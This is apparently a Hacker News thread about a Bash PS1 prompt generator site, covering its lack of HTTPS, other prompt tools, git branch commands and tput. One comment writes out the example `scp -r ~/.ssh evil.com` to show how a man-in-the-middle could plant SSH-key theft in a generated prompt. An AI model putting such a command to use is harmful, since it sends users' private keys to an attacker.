While https is a good default, and LetsEncrypt has made it relatively trivial, I wouldn't say this particularly needs it; there isn't any user data at all.
I suppose without TLS it could be intercepted and modified to return a malicious bash command, or something, but this random site on the internet could do that on its own without being intercepted anyway.
Always having https removes the need to consider the security implications of unencrypted transport on case-by-case basis.
I have been using HTTPS Everywhere extension and currently Firefox's HTTPS-Only feature in strict mode for a long time. Nowadays few links fail to work for me, so the failing ones stand out.
(I use the :where(…) wrapping so that any site actually trying to use :link::after for real stuff can override my styles without specificity conflicts.)
It’s interesting especially to see how often https: sites have http: links to their own domain, which are just going to get redirected back to the https:. (The HN footer has the “Legal” and “Apply to YC” links being to http://www.ycombinator.com/* for no good reason, a very similar case.)
And how horribly many emails use http: tracking links, and how painfully many of those domains don’t speak HTTPS.
HN’s front page normally has 0–2 out of 30 of the links being HTTP, almost always old domains. It’s fairly rare for a new site to go plain HTTP.
> I wouldn't say this particularly needs it; there isn't any user data at all.
> I suppose without TLS it could be intercepted and modified to return a malicious bash command, or something
A hacked version doesn't have to return a variation of what's on the page already. There's lots of sneaky things you could return, like a malware download pretending to be a Bash PS1 setup script, a fake GitHub based sign-up to harvest login details, a payment form for a fake product, or a simple redirect to another malicious site.
> I wouldn't say this particularly needs it; there isn't any user data at all.
I use NoScript. This page requires me to enable JavaScript for it to work. Because it doesn't use TLS, this allows any miscreant in the middle to injected JS doing god-knows-what into my browser.
If you really insist (in this case IMO understandable) on having me download and run your program, written in a turing complete scripting language, please let me do so in a way where I can be sure it is actually your program (assuming I trust you that far; which for most people I don't, hence NoScript).
Wiktionary is a website that has improved functionality after turning on JavaScript, but works just fine without it. It does not insist on using JavaScript.
I guess what you actually mean is "no one is insisting on me looking at their website"? That would be true, but I don't recall making any contrary claims.
If I do want to look at a website, the site insists on using JavaScript, but does not use HTTPS, that can be a security issue. That's what my original comment tries to point out.
> I suppose without TLS it could be intercepted and modified to return a malicious bash command, or something, but this random site on the internet could do that on its own without being intercepted anyway.
Those are two completely different attack surfaces. You should be able to trust a single site without having to trust every other hop on the Internet and a good reason why TLS should be used here.
This is a website which serves the sole purpose of encouraging people to copy snippets of text and paste them into their terminal, and there are plenty of techniques that ensure what you see on the page isn't what gets into your clipboard.
It can be configured and the default has to be something. The main problem is that it’s just too slow, at least in my experience. Even stripped of some bloat it can take >1s to get the prompt printed. Not worth it, at all.
Contrary to Starship, angel-PS1 gets all static information at startup time (ex: hostname, username) and rebuilds only the dynamic information. And for that dynamic information it uses an angel companion instead of forking and loading the configuration file for every prompt display.
Starship is the only prompt I've used that has (a) sane defaults, (b) cross platform support as well as ease of installation, and (c) good enough speed. Powerline is much slower, and I lose my serenity everytime I have to fiddle with dotfiles.
* angel-PS1 [1]: my pet project. Shell prompt code is generated at startup time from Perl code, and uses a Perl angel (not daemon) to get system information.
There's one prompt in ZSH, the adam2 prompt[1], that I completely fell in love with due to the automatic horizontal rule since it makes tracing histories so much easier when dealing with long-scrolling outputs. I've never been able to find a similar feature in another prompt/shell, nor have I had the inclination to try and replicate it, but I'd be much more inclined to switch shells/try new prompts if that were available.
I assume they are saying that because you wouldn't want something where someone could do a MITM and insert arbitrary bash commands through $() or other similar things
If the outputted prompt contains something like `scp -r ~/.ssh evil.com`, folks may not notice or be savvy enough to recognize that it is malicious. A MITM attacker could quite easily implement this.
I agree. If the maintainer is here, you can use certbot to add HTTPS easily on your existing Apache 2/Debian stack. If you're on Stretch or Buster the official instructions are the same: https://certbot.eff.org/lets-encrypt/debianstretch-apache
One note: I hate snaps and don't use them personally, but it would make it very easy for you to add HTTPS without changing your existing stack.
I've made something similar to this too, I wanted to be able to change the colours and preview so it ended up being a bit of a rabbit hole, but was fun!
I think the drag-n-drop UI is less intuitive. Wasted a few minutes trying to click these items as "buttons" and wondering if there's something wrong because of the http-onlyness of the site (console gives a lot of warning).
Shame is not single click, I thought it was broken on mobile because nothing happened when I click, then I knew it doesn't work on mobile when I realised it's drag and drop.
current git branch is missing (helps me to avoid working on the wrong branch). (tried to do it with colors, but things got too messy). I never managed to work with colors in bash propmts; they look different on each environment.
You might want to use `git rev-parse --abbrev-ref HEAD` or `git name-rev --name-only HEAD` instead of `git branch`. Plumbing commands (such as rev-parse or name-ref) are generally more interface-stable to use in a script than porcelain commands (such as git branch) which are designed for interactive use where output may change depending on user environment and configuration.
I’ve heard this advice given before and initially followed it but ‘git branch’ and parsing the output works in a few cases (I don’t recall what they are at this time) that less hackey approaches don’t.
I think that might be `git symbolic-ref` which doesn't work in detached HEAD state (e.g. when checking out a commit) whereas `git rev-parse --abbrev-ref` will print "HEAD". On the other hand, `git name-rev` will try to find the nearest named ref (including tags) and how far HEAD is from that named ref (e.g. master~1).
Internally, symbolic-ref resolve the ref in the same way as git branch, just without handling detached HEAD. __git_ps1 use a combination of rev-parse, symbolic-ref and git describe to provide a more interesting output for displaying state of the working directory.
To have the similar output for detached HEAD as git-status (e.g. "HEAD detached at fa0c4e1") then probably `git rev-parse --abbrev-rev` and `git rev-parse --short` should be used together. Unfortunately, while rev-parse can print multiple output in a single command, abbrev-rev and short cannot be used together. In such case, parsing `git status` might indeed be more suitable as it spawn only one executable instead of two.
Some porcelain commands do have --porcelain flag to ensure the stability of the interface, though (e.g. `git status --porcelain=v1`).
In case someone wonders, this does retain the repeated "+" to indicate call depth: "The first character of PS4 is replicated multiple times, as necessary, to indicate multiple levels of indirection." -- this is an important feature when working on large-ish (1-10+k LoC) scripts, which end up having very deep call stacks and a flat trace output would be completely inscrutable.
Overall it's more like 150k LoC or something like that (split into the classic three layer architecture: "scripts", "library" and "more scripts on top"). It does work though. Much better than you'd expect from hearing "tens of thousands of lines of shell".
I leave the one on remote hosts the same. I work mostly on a terminal in my laptop locally and mostly just have the time and the command number listed so I can see things in the scrollback.
`tput sgr0` reads terminfo to find out how to issue a command which resets all currently set colors, text properties, and so on, then resets them. A lot of people will do something like `echo -e '\E[32;46m'`, but that's arguably more opaque and definitely not portable across terminals.
tput is a neat command that I wish got used more! I also use `tput cnorm` to ensure the cursor is visible.
tput query a terminfo database and return an escape code suitable for that $TERM. sgr0 is the name for "reset" (e.g. "\033[0;10m" in ANSI). Using tput instead of escape code directly is better in a lot of ways. For example, it allows the shell script to be adaptive to the type of TERM it runs on (e.g. not outputting color codes at all if TERM doesn't support colors).
You can see what each tput commands are doing by running infocmp. Most TERM implement ANSI-compatible escape codes, but may prefer other escape codes for the same effect (e.g. try comparing `infocmp -1 ansi` and `infocmp -1 xterm` and `infocmp -1 screen`). You can see the entire list of these commands in terminfo(5) (`man 5 terminfo`) in Predefined Capabilities section.
tput uses the terminfo database which is usually located in /usr/share/terminfo.
If your terminal ($TERM) is not known to the operating system, you can also import the terminfo definition from another OS in a directory and point the TERMINFO environment variable to it (useful if the legacy OS you connect to via SSH doesn't have full support for your fancy terminal emulator).
Rather than turn off all attributes with "tput sgr0", instead I Save Cursor with "tput sc" at the beginning to save attributes, and Restore Cursor with "tput rc" at the end to restore attributes.
Save and Restore cursor doesn't always work because I don't necessarily need the vertical position restored, for example:
You need to add some \[ and \] around the escape codes to tell the shell they’re non-printing characters. Otherwise, things like line-wrapping don’t work right. It’s not a problem because of your \n makes it irrelevant, but just a heads up for the future.
This. The one time a month when I can't remember which git branch I'm on I'll just run 'git branch'. If you're feeling frisky, you could even alias that to 'gb'.
One time a month? Currently I have 85 work related repositories checked out, putting the current git branch and current Kubernetes context in the prompt is helping to avoid mistakes.
I also have a newline in my prompt which makes it easier to copy commands and output into Jira.
I don't have 85 repo but 5 worktree were enough to make me do some errors, so I print the 'environment' configured and the current path but that wasn't enough so now I 'invert' the colors if the current directory doesn't match the environement variables --> no more errors
145 comments
[ 6.2 ms ] story [ 187 ms ] threadI suppose without TLS it could be intercepted and modified to return a malicious bash command, or something, but this random site on the internet could do that on its own without being intercepted anyway.
Who has more incentive to do so: the person that wants their site to have visitors, or a malicious attacker intent on MITM people in the first place?
What a ridiculous defense of insecurity.
I have been using HTTPS Everywhere extension and currently Firefox's HTTPS-Only feature in strict mode for a long time. Nowadays few links fail to work for me, so the failing ones stand out.
It’s interesting especially to see how often https: sites have http: links to their own domain, which are just going to get redirected back to the https:. (The HN footer has the “Legal” and “Apply to YC” links being to http://www.ycombinator.com/* for no good reason, a very similar case.)
And how horribly many emails use http: tracking links, and how painfully many of those domains don’t speak HTTPS.
HN’s front page normally has 0–2 out of 30 of the links being HTTP, almost always old domains. It’s fairly rare for a new site to go plain HTTP.
A hacked version doesn't have to return a variation of what's on the page already. There's lots of sneaky things you could return, like a malware download pretending to be a Bash PS1 setup script, a fake GitHub based sign-up to harvest login details, a payment form for a fake product, or a simple redirect to another malicious site.
I use NoScript. This page requires me to enable JavaScript for it to work. Because it doesn't use TLS, this allows any miscreant in the middle to injected JS doing god-knows-what into my browser.
If you really insist (in this case IMO understandable) on having me download and run your program, written in a turing complete scripting language, please let me do so in a way where I can be sure it is actually your program (assuming I trust you that far; which for most people I don't, hence NoScript).
--
https://en.wiktionary.org/wiki/insist#Verb
Wiktionary is a website that has improved functionality after turning on JavaScript, but works just fine without it. It does not insist on using JavaScript.
I guess what you actually mean is "no one is insisting on me looking at their website"? That would be true, but I don't recall making any contrary claims.
If I do want to look at a website, the site insists on using JavaScript, but does not use HTTPS, that can be a security issue. That's what my original comment tries to point out.
Those are two completely different attack surfaces. You should be able to trust a single site without having to trust every other hop on the Internet and a good reason why TLS should be used here.
Edit: Found it, it’s a cross-shell prompt. Appears to require a binary install.
https://github.com/starship/starship
Then again, I only use 5 of all the plugins available.
https://github.com/dolmen/angel-PS1
~/bin via v1.8.0 via v2.7.16 on (us-east-2) [1]
even on non-project folders and have no idea why that is being listed.
[1] emojis got lost in hn, but it was a coffee cup, a snake and a cloud..
Now please add some examples, so it's easier to get started with something to modify. :)
* As an idea, this is excellent. It's intuitive to use and provides full instructions on how to implement
* Putting an element in any other position than the end of the prompt is fiddly.
* I'd love for the option to to be able to colour elements.
* More advanced or exotic element types such as Git Branch would be excellent (Not sure if Bash supports this, but I've seen it in some shells)
* LiquidPrompt [0] (I'm a former maintainer)
* angel-PS1 [1]: my pet project. Shell prompt code is generated at startup time from Perl code, and uses a Perl angel (not daemon) to get system information.
[0] https://github.com/nojhan/liquidprompt
[1] https://github.com/dolmen/angel-PS1
[1]: https://git-scm.com/book/id/v2/Appendix-A%3A-Git-in-Other-En...
https://dom111.github.io/bash-ps1/
[1]: https://imgur.com/1X9bY8X
One note: I hate snaps and don't use them personally, but it would make it very easy for you to add HTTPS without changing your existing stack.
https://dom111.github.io/bash-ps1/
- I actually don't care about the exit code unless it was non-zero
- It calculates the delta three times
but I've been to busy to optimise it.
Exit status should defo be in the default in all distros.
Internally, symbolic-ref resolve the ref in the same way as git branch, just without handling detached HEAD. __git_ps1 use a combination of rev-parse, symbolic-ref and git describe to provide a more interesting output for displaying state of the working directory.
To have the similar output for detached HEAD as git-status (e.g. "HEAD detached at fa0c4e1") then probably `git rev-parse --abbrev-rev` and `git rev-parse --short` should be used together. Unfortunately, while rev-parse can print multiple output in a single command, abbrev-rev and short cannot be used together. In such case, parsing `git status` might indeed be more suitable as it spawn only one executable instead of two.
Some porcelain commands do have --porcelain flag to ensure the stability of the interface, though (e.g. `git status --porcelain=v1`).
export PS1="\n\$(kube_ps1)\n\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[0;31m\]\$(__git_ps1)\n\$\[\033[00m\] "
Note it needs the git-prompt.sh script (usually comes with the bash-completion package), and the kube-ps1 script: https://github.com/jonmosco/kube-ps1
It will show you the current kubernetes profile and namespace, user@host, current directory and git branch if you're in a git repo.
Make your trace output more useful/verbose in your scripts:
This will print the filename, function name, line number, and line content during execution.Try this to get the real default:
or
PS!='# '
tput is a neat command that I wish got used more! I also use `tput cnorm` to ensure the cursor is visible.
You can see what each tput commands are doing by running infocmp. Most TERM implement ANSI-compatible escape codes, but may prefer other escape codes for the same effect (e.g. try comparing `infocmp -1 ansi` and `infocmp -1 xterm` and `infocmp -1 screen`). You can see the entire list of these commands in terminfo(5) (`man 5 terminfo`) in Predefined Capabilities section.
If your terminal ($TERM) is not known to the operating system, you can also import the terminfo definition from another OS in a directory and point the TERMINFO environment variable to it (useful if the legacy OS you connect to via SSH doesn't have full support for your fancy terminal emulator).
It’s more efficient to echo CSI 0m, in shell than to run another process to do the same. Every mainstream terminal supports it.
Save and Restore cursor doesn't always work because I don't necessarily need the vertical position restored, for example:
https://github.com/dolmen/angel-PS1
More detail from my .bashrc:
I define the colors as it makes it easier to modify PS1 when the spirit moves me.I guess using a generator or toolkit could be useful, but I tweaked mine over the years and prefer it just this way.
Edit: I forgot to mention that I use different colors for user vs. root prompts, as that gives immediate visual confirmation of privilege level.
!! repeats the last command
!N repeats the command with that index in the history
https://github.com/whyboris/dotfiles/blob/master/.bashrc
You could even have colors be containers you put other elements inside to make it easier to visualize
I also have a newline in my prompt which makes it easier to copy commands and output into Jira.
oh-my-zsh does this by default as it comes with the "git" plugin loaded. "gb -vv" is a common thing I run.
Apparently the extension PS1 is a reference to PowerShell 1.0.0, thankfully Microsoft did not increase the number.
Source
https://github.com/PowerShell/PowerShell/issues/2013